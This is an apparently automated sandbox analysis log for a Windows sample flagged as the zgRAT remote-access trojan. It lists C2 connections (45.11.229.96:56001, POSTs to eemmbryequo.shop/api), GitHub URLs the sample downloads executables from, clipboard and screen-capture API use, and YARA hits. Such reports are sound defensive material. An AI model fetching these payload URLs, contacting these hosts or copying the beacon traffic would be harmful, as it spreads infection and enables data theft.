                  Source: global trafficTCP traffic: 192.168.2.4:49730 -> 45.11.229.96:56001
                  Source: Joe Sandbox ViewIP Address: 104.21.39.11 104.21.39.11
                  Source: Joe Sandbox ViewASN Name: ALPHAONE-ASUS ALPHAONE-ASUS
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: eemmbryequo.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=aAoxDkAMWn_Lfoc_bGHrsAHBYmo8D35VKkApn.aKTXw-1726705564-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: eemmbryequo.shop
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficDNS traffic detected: DNS query: strompreis.ru
                  Source: global trafficDNS traffic detected: DNS query: eemmbryequo.shop
                  Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: eemmbryequo.shop
                  Source: l6E.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: l6E.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: l6E.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: l6E.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: l6E.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: l6E.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: l6E.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: l6E.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: l6E.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                  Source: 57lklPjdPc.exe, 00000000.00000002.4199201714.00000000011E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: 57lklPjdPc.exe, 00000000.00000002.4214856571.0000000005B70000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: powershell.exe, 00000001.00000002.1748204498.00000000057AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: l6E.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: l6E.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: l6E.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: l6E.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: powershell.exe, 00000001.00000002.1740782513.0000000004896000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003158000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1740782513.0000000004741000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Amcache.hve.17.drString found in binary or memory: http://upx.sf.net
                  Source: powershell.exe, 00000001.00000002.1740782513.0000000004896000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: l6E.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: powershell.exe, 00000001.00000002.1740782513.0000000004741000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                  Source: powershell.exe, 00000001.00000002.1748204498.00000000057AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000001.00000002.1748204498.00000000057AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000001.00000002.1748204498.00000000057AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000001.00000002.1740782513.0000000004896000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003338000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003158000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000003.00000002.2012521370.0000000002D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll
                  Source: 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003338000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003158000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000003.00000002.2012521370.0000000002D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe
                  Source: 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003158000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000003.00000002.2012521370.0000000002D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe
                  Source: 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.execABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg
                  Source: powershell.exe, 00000001.00000002.1748204498.00000000057AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003338000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003158000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000003.00000002.2012521370.0000000002D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003338000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003158000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000003.00000002.2012521370.0000000002D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003338000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003158000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000003.00000002.2012521370.0000000002D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownHTTPS traffic detected: 104.21.39.11:443 -> 192.168.2.4:49740 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.39.11:443 -> 192.168.2.4:49741 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00432D80 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,14_2_00432D80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00432D80 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,14_2_00432D80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00432EF0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,14_2_00432EF0

                  System Summary

                  barindex
                  Source: 0.2.57lklPjdPc.exe.443c110.1.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 0.2.57lklPjdPc.exe.457c130.2.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 0.2.57lklPjdPc.exe.443c110.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 0.2.57lklPjdPc.exe.6e40000.7.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 0.2.57lklPjdPc.exe.6e40000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 0.2.57lklPjdPc.exe.457c130.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 00000000.00000002.4219277118.0000000006E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 57lklPjdPc.exe, InfoBaseConnector.csLarge array initialization: CheckEvent: array initializer size 294576
                  Source: l6E.exe.0.dr, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 333824
                  Source: 57lklPjdPc.exe.0.dr, InfoBaseConnector.csLarge array initialization: CheckEvent: array initializer size 294576
                  Source: 0.2.57lklPjdPc.exe.4236527.3.raw.unpack, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 333824
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_030B51D00_2_030B51D0
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_030BE1E00_2_030BE1E0
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_030B55300_2_030B5530
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_030BD5C80_2_030BD5C8
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_030B1AA60_2_030B1AA6
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_030B1AB80_2_030B1AB8
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_030BD9100_2_030BD910
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_030B51880_2_030B5188
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_030B51BF0_2_030B51BF
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_030BB1C00_2_030BB1C0
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_030B49F80_2_030B49F8
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_030B49F40_2_030B49F4
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_030B55200_2_030B5520
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05C78D180_2_05C78D18
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05C792020_2_05C79202
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05C7DFD60_2_05C7DFD6
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05C7AFD00_2_05C7AFD0
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D600400_2_05D60040
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D690700_2_05D69070
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D656000_2_05D65600
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D600070_2_05D60007
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D6A22F0_2_05D6A22F
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D717500_2_05D71750
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D7D5F20_2_05D7D5F2
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D755000_2_05D75500
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D755280_2_05D75528
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D717420_2_05D71742
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D731E00_2_05D731E0
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D772680_2_05D77268
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D732080_2_05D73208
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D95CA00_2_05D95CA0
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D9E9200_2_05D9E920
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D9E9100_2_05D9E910
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D9D0280_2_05D9D028
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D9FBF70_2_05D9FBF7
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_0663C2050_2_0663C205
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_066323120_2_06632312
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_066300400_2_06630040
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_0663D0E80_2_0663D0E8
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_0663231B0_2_0663231B
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_066323D60_2_066323D6
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_0663003F0_2_0663003F
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_0663CE480_2_0663CE48
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_0663CE580_2_0663CE58
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_06631E970_2_06631E97
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_06631DA50_2_06631DA5
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_06631DAE0_2_06631DAE
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_06F33EA00_2_06F33EA0
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_06F33E910_2_06F33E91
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_06FA7D880_2_06FA7D88
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_0700BD910_2_0700BD91
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_0700BE5E0_2_0700BE5E
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_0700BDA40_2_0700BDA4
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_0700C13E0_2_0700C13E
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_0700C09F0_2_0700C09F
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_0700C0E00_2_0700C0E0
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_0701E6600_2_0701E660
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_070165780_2_07016578
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeCode function: 3_2_02B0E1E03_2_02B0E1E0
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeCode function: 3_2_02B051D03_2_02B051D0
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeCode function: 3_2_02B0D5C83_2_02B0D5C8
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeCode function: 3_2_02B01AB83_2_02B01AB8
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeCode function: 3_2_02B01AA63_2_02B01AA6
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeCode function: 3_2_02B051BF3_2_02B051BF
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeCode function: 3_2_02B049AB3_2_02B049AB
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeCode function: 3_2_02B049F83_2_02B049F8
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeCode function: 3_2_02B0B1C03_2_02B0B1C0
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeCode function: 3_2_02B0D9103_2_02B0D910
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeCode function: 7_2_00E1E1E07_2_00E1E1E0
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeCode function: 7_2_00E151D07_2_00E151D0
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeCode function: 7_2_00E1D5C87_2_00E1D5C8
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeCode function: 7_2_00E149F27_2_00E149F2
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeCode function: 7_2_00E149F87_2_00E149F8
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeCode function: 7_2_00E1B1C07_2_00E1B1C0
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeCode function: 7_2_00E151BF7_2_00E151BF
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeCode function: 7_2_00E1D9107_2_00E1D910
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeCode function: 7_2_00E11AA67_2_00E11AA6
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeCode function: 7_2_00E11AB87_2_00E11AB8
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeCode function: 7_2_00E155207_2_00E15520
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeCode function: 7_2_00E155307_2_00E15530
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040F14014_2_0040F140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040F7C014_2_0040F7C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043896514_2_00438965
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00410BE014_2_00410BE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041B05414_2_0041B054
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041E07014_2_0041E070
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040100014_2_00401000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041200114_2_00412001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041000014_2_00410000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004230CB14_2_004230CB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044411014_2_00444110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040913D14_2_0040913D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041A1C014_2_0041A1C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0042519814_2_00425198
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044226214_2_00442262
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0042E22314_2_0042E223
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004092C514_2_004092C5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004012F014_2_004012F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0042737014_2_00427370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041437414_2_00414374
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044133014_2_00441330
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044238014_2_00442380
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040138814_2_00401388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004123B014_2_004123B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0042248014_2_00422480
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040A4A014_2_0040A4A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004265A214_2_004265A2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0042364014_2_00423640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0042764014_2_00427640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0042362414_2_00423624
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043D63014_2_0043D630
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004426B014_2_004426B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0042C75214_2_0042C752
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044075014_2_00440750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040D7D014_2_0040D7D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004437E014_2_004437E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040379014_2_00403790
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044184014_2_00441840
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0042394014_2_00423940
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040990914_2_00409909
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040798014_2_00407980
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004299B514_2_004299B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00424A4F14_2_00424A4F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00410A7014_2_00410A70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00412A2C14_2_00412A2C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00443AF014_2_00443AF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040BA9014_2_0040BA90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00432B6014_2_00432B60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00437B0014_2_00437B00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040EB2014_2_0040EB20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00406BB014_2_00406BB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00428C5E14_2_00428C5E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00412C3C14_2_00412C3C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041CC9014_2_0041CC90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00441D5014_2_00441D50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00422D6A14_2_00422D6A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0042CD0614_2_0042CD06
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0042BD1014_2_0042BD10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00413D2314_2_00413D23
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00419D2214_2_00419D22
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00443DE014_2_00443DE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00428E6314_2_00428E63
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00404EC014_2_00404EC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00406F7014_2_00406F70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00426F1014_2_00426F10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040FFDE14_2_0040FFDE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00440FE014_2_00440FE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00409F8014_2_00409F80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040AF8014_2_0040AF80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040C590 appears 47 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040DF50 appears 178 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2124 -s 1736
                  Source: 57lklPjdPc.exe, 00000000.00000002.4199201714.000000000116E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 57lklPjdPc.exe
                  Source: 57lklPjdPc.exe, 00000000.00000002.4208692705.000000000457C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePluginExecuting.dll" vs 57lklPjdPc.exe
                  Source: 57lklPjdPc.exe, 00000000.00000002.4219277118.0000000006E40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamePluginExecuting.dll" vs 57lklPjdPc.exe
                  Source: 57lklPjdPc.exe, 00000000.00000002.4208692705.00000000043C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePluginExecuting.dll" vs 57lklPjdPc.exe
                  Source: 57lklPjdPc.exe, 00000003.00000002.2012521370.0000000002E4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTzeqis.dll" vs 57lklPjdPc.exe
                  Source: 57lklPjdPc.exe, 00000003.00000002.2012912315.0000000003E25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTzeqis.dll" vs 57lklPjdPc.exe
